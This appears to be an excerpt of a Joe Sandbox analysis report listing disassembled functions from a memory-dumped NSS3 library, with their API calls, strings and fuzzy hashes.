Opcode ID: 58421e2418bd860410f3df5b5d8a847f61bbc6f05f4ac3fb5c51cc556d617ee5
Instruction ID: 4a47a2addbee36c7bab2c953f35f5683d951dc9f21b61c441c46af68563ff56c
Opcode Fuzzy Hash: 58421e2418bd860410f3df5b5d8a847f61bbc6f05f4ac3fb5c51cc556d617ee5
Instruction Fuzzy Hash: 57013CF6B04201ABDB055F65EC0089676A1BB1226C7154378F82647BF1EB22ED29C78A

Function 6C58AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C58AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6C58AF5C
%s at line %d of [%.10s], xrefs: 6C58AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C58AFC4
misuse, xrefs: 6C58AFCE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 603b4e69ec66919b72f30a577ada92ae9979ba9b74ea07b301e5e7fd2f188106
Instruction ID: 1a5acf06791e62a10eabc833ec9019cd6618cd9a05f717039a45c218fd25156b
Opcode Fuzzy Hash: 603b4e69ec66919b72f30a577ada92ae9979ba9b74ea07b301e5e7fd2f188106
Instruction Fuzzy Hash: A191F2B5B062258FDB04CF29CC50BAAB7F1BF49314F1948A8E864AB791D734EC01CB60

Function 6C5EFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C5EFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5EFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5EFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C5EFDDE

Part of subcall function 6C5F8800: TlsGetValue.KERNEL32(?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8821
Part of subcall function 6C5F8800: TlsGetValue.KERNEL32(?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F883D
Part of subcall function 6C5F8800: EnterCriticalSection.KERNEL32(?,?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8856
Part of subcall function 6C5F8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5F8887
Part of subcall function 6C5F8800: PR_Unlock.NSS3(?,?,?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8899

Strings

pkcs11:, xrefs: 6C5EFC4F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 3acde7c44536d6570229f3653320f3760656229b59653b98da6e6b28d9e14846
Instruction ID: 6e6eb502b9ef58ea0a0cb9de354ed22ad793782783f3fe77b91a3d8510c39264
Opcode Fuzzy Hash: 3acde7c44536d6570229f3653320f3760656229b59653b98da6e6b28d9e14846
Instruction Fuzzy Hash: D051F4B2B04111EBEF008F65BE40B9A3B65AF89358F250625ED195BB41EF31ED05CB92

Function 6C52BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C52BE02

Part of subcall function 6C659C40: memcmp.VCRUNTIME140(?,00000000,6C52C52B), ref: 6C659D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52BE9F

Strings

%s at line %d of [%.10s], xrefs: 6C52BE98
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52BE89
database corruption, xrefs: 6C52BE93

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 96c2b5d4fb11188a6194a8e863f1823fc792b2e115a40f67cc3e07dd8b02abfe
Instruction ID: 0f63b04487994cd9bc6ef018173996912f6e5964ba9985d299f262e2baecce55
Opcode Fuzzy Hash: 96c2b5d4fb11188a6194a8e863f1823fc792b2e115a40f67cc3e07dd8b02abfe
Instruction Fuzzy Hash: 3C315731A042558BC700EF29CCD4AABBBE2AF41314B098954EE9A1BAC1D338EC15C7D1

Function 6C616DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C616E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C616E57

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C616E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C616EAA

Strings

nkl, xrefs: 6C616DF9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nkl
API String ID: 3163584228-1663185687
Opcode ID: 2c59c3d2dd61b8508c2788cfab1112bed4642bb5f1b6bc5eb9190b46a547c955
Instruction ID: 53302a4f2651789e1aa30105fa5bf962da70c0b834b33d557874e74ad307b530
Opcode Fuzzy Hash: 2c59c3d2dd61b8508c2788cfab1112bed4642bb5f1b6bc5eb9190b46a547c955
Instruction Fuzzy Hash: 7D31A07A61C612EEDB141F38C804396BBA4EB0231BF14473CD89AD6E40EB31E555CB89

Function 6C5A1EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1EE2

Part of subcall function 6C601820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C5A1D97,?,?), ref: 6C601836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F37
DER_DecodeTimeChoice_Util.NSS3(?,dLZl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F53

Strings

dLZl, xrefs: 6C5A1F2B, 6C5A1F51

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLZl
API String ID: 3216063065-3905966913
Opcode ID: 94e797969a49bc842c89776170e7a2f3e5f664de508fd9b14976fb35da99e37d
Instruction ID: bc0eeb06e0073cc1090dc6a6575595d778be5a92878e9b33973db079c776c616
Opcode Fuzzy Hash: 94e797969a49bc842c89776170e7a2f3e5f664de508fd9b14976fb35da99e37d
Instruction Fuzzy Hash: 9F218371504245EBC700CF66DD00A9B77E9AB89659F000929E854D3A40F330EA19C7A6

Function 6C590DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C590BDE), ref: 6C590DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C590BDE), ref: 6C590DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C590BDE), ref: 6C590DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C590BDE), ref: 6C590E32

Strings

%s incr => %d (find lib), xrefs: 6C590E2D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 2d796d744ce34cf35ee190b5c23aa299f00306cedecff8cb0bdaad57cebc36f2
Instruction ID: 9db72e22e582cad7d01ca0a2ac5624761241967d030c46a04b3c1eee8f8f6bb7
Opcode Fuzzy Hash: 2d796d744ce34cf35ee190b5c23aa299f00306cedecff8cb0bdaad57cebc36f2
Instruction Fuzzy Hash: 42012872B003509FE7209F249C45E1773BCDB89608B0448BEE905D7741E762FC1887E5

Function 6C5D1CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C5D1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C5D1CF1

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

Strings

pInitArgs = 0x%p, xrefs: 6C5D1CEC
nkl, xrefs: 6C5D1D09, 6C5D1D30
C_Initialize, xrefs: 6C5D1CD3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$nkl
API String ID: 1907330108-2703718790
Opcode ID: 6d68bde7d0081168be7901f9d5b6a938a067e6789e586d9003b1015084de75f4
Instruction ID: b206d2ef4a6c115ee050a640e0ea56f4a0b972040cb9a2eb844a434bd96d9b1e
Opcode Fuzzy Hash: 6d68bde7d0081168be7901f9d5b6a938a067e6789e586d9003b1015084de75f4
Instruction Fuzzy Hash: E1018CB6301284DFDB00AF68DD49B5637B5ABC637AF0A4439E409D3611DF30E849CB96

Function 6C64AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC2D

Part of subcall function 6C5EADC0: TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE10
Part of subcall function 6C5EADC0: EnterCriticalSection.KERNEL32(?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE24
Part of subcall function 6C5EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C5CD079,00000000,00000001), ref: 6C5EAE5A
Part of subcall function 6C5EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE6F
Part of subcall function 6C5EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE7F
Part of subcall function 6C5EADC0: TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEB1
Part of subcall function 6C5EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEC9

PK11_FreeSymKey.NSS3(?,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC59
free.MOZGLUE(8CB6FF01,6C626AC6,?,?,?,?,?,?,?,?,?,?,6C635D40,00000000,?,6C63AAD4), ref: 6C64AC62

Strings

@]cl, xrefs: 6C64AC05

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]cl
API String ID: 1595327144-3571462101
Opcode ID: c09de5e320b13dc9dadb510e6b3ce113994b6161d42b8c91490edef823786580
Instruction ID: 9b34317fe4d34a89351518eff80673d40777fe459f83d8b11cc0f079269311bb
Opcode Fuzzy Hash: c09de5e320b13dc9dadb510e6b3ce113994b6161d42b8c91490edef823786580
Instruction Fuzzy Hash: 01012CB5600204ABDB10DF25E9C0B567BA8AB44758F18C068E9498FB06D731E854CBA5

Function 6C539C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C539CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C539D45
EnterCriticalSection.KERNEL32(?), ref: 6C539D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C539DDE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 5789a2dd2b7caa4c81c14442ba8ef88c88b5f70a1c048583c33993b411ccb92b
Instruction ID: 8437df01a6a6f763d8fa1477b8eed961159ef980e1fe7d43551a3428484b7b39
Opcode Fuzzy Hash: 5789a2dd2b7caa4c81c14442ba8ef88c88b5f70a1c048583c33993b411ccb92b
Instruction Fuzzy Hash: 67A1AEB17041108BEB09DF25EC89B6E3B72BB93318F18152DE41A87A40EF399845DB96

Function 6C5C1E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C5C1ECC

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

TlsGetValue.KERNEL32 ref: 6C5C1EDF
EnterCriticalSection.KERNEL32(?), ref: 6C5C1EEF
PR_ExitMonitor.NSS3(?), ref: 6C5C1F37
PR_Unlock.NSS3(?), ref: 6C5C1F44

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 0b6064993f5442886ded65b38be4783812594991dc6667738fe708ecf276d99a
Instruction ID: 7b05cba667eece2f471de54c04da9f1cbd4a4ea4eff42b986db51a0bee827644
Opcode Fuzzy Hash: 0b6064993f5442886ded65b38be4783812594991dc6667738fe708ecf276d99a
Instruction Fuzzy Hash: 26718AB5A043019FD700CF65DC40A5BBBF1BF89358F14492DE89993A21E731E958CBA3

Function 6C64DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C64DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C64DE77

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 30391e5a4dfa781e757943f246367fbab968566002d0009e076694ff8dad5b11
Instruction ID: 3bf72d44aed04855442c7ef4df9d82ce57ed3ebb61e156f3ccf6deb61632be4b
Opcode Fuzzy Hash: 30391e5a4dfa781e757943f246367fbab968566002d0009e076694ff8dad5b11
Instruction Fuzzy Hash: 84716571E00314CBDB20CF9AC5C0A89B7B5BF8A718F25C16DD9596B742DB30A906CF84

Function 6C5BDFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(D958E852,6C5C1397,5B5F5EC0,?,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB3C
Part of subcall function 6C5BAB10: free.MOZGLUE(D958E836,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB49
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(5D5E6C7B), ref: 6C5BAB5C
Part of subcall function 6C5BAB10: free.MOZGLUE(5D5E6C6F), ref: 6C5BAB63
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C5BAB6F
Part of subcall function 6C5BAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C5BAB76

TlsGetValue.KERNEL32(?,?,6C5BB266,6C5C15C6,?,?,6C5C15C6), ref: 6C5BDFDA
EnterCriticalSection.KERNEL32(?,?,?,6C5BB266,6C5C15C6,?,?,6C5C15C6), ref: 6C5BDFF3
PK11_IsFriendly.NSS3(?,?,?,?,6C5BB266,6C5C15C6,?,?,6C5C15C6), ref: 6C5BE029
PK11_IsLoggedIn.NSS3 ref: 6C5BE046

Part of subcall function 6C5C8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FAF
Part of subcall function 6C5C8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FD1
Part of subcall function 6C5C8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FFA
Part of subcall function 6C5C8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9013
Part of subcall function 6C5C8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9042
Part of subcall function 6C5C8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C905A
Part of subcall function 6C5C8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9073
Part of subcall function 6C5C8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9111

PR_Unlock.NSS3(?,?,?,?,6C5BB266,6C5C15C6,?,?,6C5C15C6), ref: 6C5BE149

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: da62b8cdb793756547dd1fbfdaaabba1a145ac6bb58e256473e8d7d57a187c4d
Instruction ID: 96cd464856c6c61d464014ad360719479779d66dfb70f6ecd5c8a7872d0c5322
Opcode Fuzzy Hash: da62b8cdb793756547dd1fbfdaaabba1a145ac6bb58e256473e8d7d57a187c4d
Instruction Fuzzy Hash: 8A517A74600605CFDB10DF29C8A476ABBF1FF84309F1988ACD899AB741D775E885CB82

